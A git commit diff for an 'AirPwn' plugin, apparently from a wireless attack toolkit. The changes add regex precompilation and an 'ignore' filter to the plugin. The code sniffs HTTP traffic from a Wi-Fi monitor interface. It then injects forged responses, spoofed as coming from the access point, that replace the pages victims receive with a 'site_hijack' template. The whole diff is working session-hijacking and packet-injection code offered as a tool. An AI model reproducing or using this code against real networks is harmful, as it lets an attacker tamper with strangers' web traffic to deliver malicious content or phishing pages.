optimized regex performance on airpwn plugin, added support for ignore field in config

config_files/airpwn.cfg

@@ -2,8 +2,5 @@
 
 [site_hijack]
 match = ^(GET|POST).*
-response = ./config_files/airpwn_templates/site_hijack
+ignore = (^GET [^ ?]+\.(?:jpg|jpeg|gif|png|ico|css)|(?:host: .*google.com))
-
+response = ./config_files/airpwn_templates/site_hijack
-#[puppy_jpg]
-#match = ^GET [^ ]+\.(?i:jpg|jpeg|gif|png)
-#response = ./config_files/airpwn_templates/puppy_jpg

plugins/AirPwn.py

@@ -28,10 +28,19 @@ class AirPwn(Plugin):
 		if os.geteuid() != 0:
 			sys.exit("[-] AirPwn plugin requires root privileges")
 
+		if not self.mon_interface:
+			sys.exit("[-] AirPwn plugin requires --miface argument")
+
 		try:
-			self.aircfg= ConfigObj(self.aircfg)
+			self.aircfg = ConfigObj(self.aircfg)
-		except:
+			#Here we compile the regexes for faster performance when injecting packets
-			sys.exit("[-] Error parsing airpwn config file")
+			for rule in self.aircfg.items():
+				rule[1]['match'] = re.compile(r'%s' % rule[1]['match'])
+				if 'ignore' in rule[1].keys():
+					rule[1]['ignore'] = re.compile(r'%s' % rule[1]['ignore'])
+
+		except Exception, e:
+			sys.exit("[-] Error parsing airpwn config file: %s" % e)
 
 		print "[*] AirPwn plugin online"
 		t = threading.Thread(name='sniff_http_thread', target=self.sniff_http, args=(self.mon_interface,))
@@ -53,20 +62,33 @@ class AirPwn(Plugin):
 	def http_callback(self, packet):
 		if packet.haslayer(TCP) and packet.haslayer(Raw):
 			for rule in self.aircfg.items():
-				if (re.match(r'%s' % rule[1]['match'], packet[Raw].load)):
+				if 'ignore' in rule[1].keys():
-					response = packet.copy()
+					if (re.search(rule[1]['match'], packet[Raw].load)) and not (re.search(rule[1]['ignore'], packet[Raw].load)):
-					# We need to start by changing our response to be "from-ds", or from the access point.
+						# First we copy the original packet
-					response.FCfield = 2L
+						response = packet.copy()
-					# Switch the MAC addresses
+						# We need to start by changing our response to be "from-ds", or from the access point.
-					response.addr1, response.addr2 = packet.addr2, packet.addr1
+						response.FCfield = 2L
-					# Switch the IP addresses
+						# Switch the MAC addresses
-					response.src, response.dst = packet.dst, packet.src
+						response.addr1, response.addr2 = packet.addr2, packet.addr1
-					# Switch the ports
+						# Switch the IP addresses
-					response.sport, response.dport = packet.dport, packet.sport
+						response.src, response.dst = packet.dst, packet.src
-					response[Raw].load = open(rule[1]['response'], 'r').read()
+						# Switch the ports
-
+						response.sport, response.dport = packet.dport, packet.sport
-					sendp(response, iface=self.mon_interface, verbose=False)
+						# Inject our data
-					logging.info("%s >> Replaced content" % response.src)
+						response[Raw].load = open(rule[1]['response'], 'rb').read()
+						# Send the packet
+						sendp(response, iface=self.mon_interface, verbose=False)
+						logging.info("%s >> Replaced content" % response.src)
+				elif 'ignore' not in rule[1].keys():
+					if (re.search(rule[1]['match'], packet[Raw].load)):
+						response = packet.copy()
+						response.FCfield = 2L
+						response.addr1, response.addr2 = packet.addr2, packet.addr1
+						response.src, response.dst = packet.dst, packet.src
+						response.sport, response.dport = packet.dport, packet.sport
+						response[Raw].load = open(rule[1]['response'], 'rb').read()
+						sendp(response, iface=self.mon_interface, verbose=False)
+						logging.info("%s >> Replaced content" % response.src)
 
 	def dns_callback(self, packet):
 		if packet.haslayer(UDP) and packet.haslayer(DNS):